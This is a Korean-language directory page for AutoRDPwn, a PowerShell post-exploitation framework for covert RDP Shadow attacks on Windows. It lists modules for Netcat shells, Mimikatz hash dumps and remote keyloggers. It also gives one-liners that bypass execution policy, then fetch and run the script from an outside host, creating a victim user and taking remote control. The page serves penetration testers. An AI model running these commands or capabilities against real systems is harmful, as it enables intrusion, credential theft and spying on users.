Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
AutoRDPwn — 그림자 공격 프레임워크 | Kitploit
도구/GitHubGitHub/joelgmsec/autordpwn
Password CrackingPrivilege EscalationPayload GenerationLateral MovementPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubjoelgmsec/autordpwn

AutoRDPwn

그림자 공격 프레임워크

저장소 보기
1.1k499154년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

AutoRDPwn

AutoRDPwn은 Powershell로 작성된 사후 침투 프레임워크로, 주로 Microsoft Windows 컴퓨터에 대한 Shadow 공격을 자동화하기 위해 설계되었습니다. 이 취약점(Microsoft에서 기능으로 분류)은 원격 공격자가 피해자의 동의 없이 데스크톱을 볼 수 있게 하며, 필요에 따라 제어할 수도 있습니다. 이는 운영 체제 자체의 네이티브 도구를 사용합니다.

추가 모듈 덕분에 Netcat을 통한 원격 셸 획득, Mimikatz를 사용한 시스템 해시 덤프, 원격 키로거 로드 등이 가능합니다. 이 모든 것은 7개 언어로 완전히 직관적인 메뉴를 통해 이루어집니다.

또한, 사용법 섹션에 설명된 일련의 매개변수를 통해 리버스 셸에서 사용할 수 있습니다.

요구 사항

Powershell 4.0 이상

변경 사항

버전 5.1

• 많은 버그 수정

• 미적 개선 및 대기 시간 개선

• 시스템 설정을 통한 프록시 인식 연결

• 이제 .zip 파일을 다운로드하여 오프라인 도구 사용 가능

• Enter 키를 눌러 언어 자동 감지

• Invoke-DCOM이 SharpRDP로 대체됨

• PowerUp이 Invoke-PrivescCheck로 대체됨

• 피해자 측 자동 정리 서브루틴 생성

• 새로운 모듈 사용 가능: AES로 암호화된 SMB Shell

• 새로운 모듈 사용 가능: RunAs로 사용자 변경

*나머지 변경 사항은 CHANGELOG 파일에서 확인할 수 있습니다.

사용법

이 애플리케이션은 로컬, 원격 또는 팀 간 피벗에 사용할 수 있습니다.

리버스 셸에서 원격으로 사용할 때는 다음 매개변수를 사용해야 합니다:

매개변수설명
-admin / -noadmin보유한 권한에 따라 하나를 사용합니다
-nogui메뉴 및 일부 색상 로드를 방지하며, 기능은 보장됩니다
-lang언어 선택 (English, Spanish, French, German, Italian, Russian 또는 Portuguese)
-option메뉴와 마찬가지로 공격 실행 방식을 선택할 수 있습니다
-shadow원격 장치를 볼지 제어할지 결정합니다
-createuser이 매개변수는 선택 사항이며, 피해자 컴퓨터에 AutoRDPwn:AutoRDPwn 사용자가 생성됩니다
-noclean피해자 컴퓨터에서 모든 변경 사항을 되돌리는 프로세스를 비활성화합니다

한 줄 로컬 실행:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

한 줄 원격 실행 예시:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

자세한 사용 가이드는 다음 링크에서 확인할 수 있습니다:

https://darkbyte.net/autordpwn-la-guia-definitiva

스크린샷

AutoRDPwn1_en AutoRDPwn2_en

라이선스

이 프로젝트는 GNU 3.0 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

크레딧 및 감사의 말

이 프레임워크는 Joel Gámez Molina // @JoelGMSec에 의해 처음부터 생성되고 설계되었습니다.

일부 모듈은 타사 코드, 스크립트 및 도구를 사용하며, 특히 다음과 같습니다:

• Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP

그 외에도 여기에 다 담지 못한 많은 분들이 있습니다.. 모든 분들과 그들의 훌륭한 작업에 감사드립니다.

연락처

이 소프트웨어는 어떠한 종류의 보증도 제공하지 않습니다. 사용은 교육 환경 및/또는 고객의 동의를 받은 보안 감사에만 독점적으로 사용됩니다. 저는 오용이나 이로 인해 발생할 수 있는 손해에 대해 책임을 지지 않습니다.

자세한 내용은 Twitter @JoelGMSec와 제 블로그 darkbyte.net에서 저를 찾을 수 있습니다.

지원

제 작업을 지원하려면 커피 한 잔 사주세요:

buymeacoffe

도구 다운로드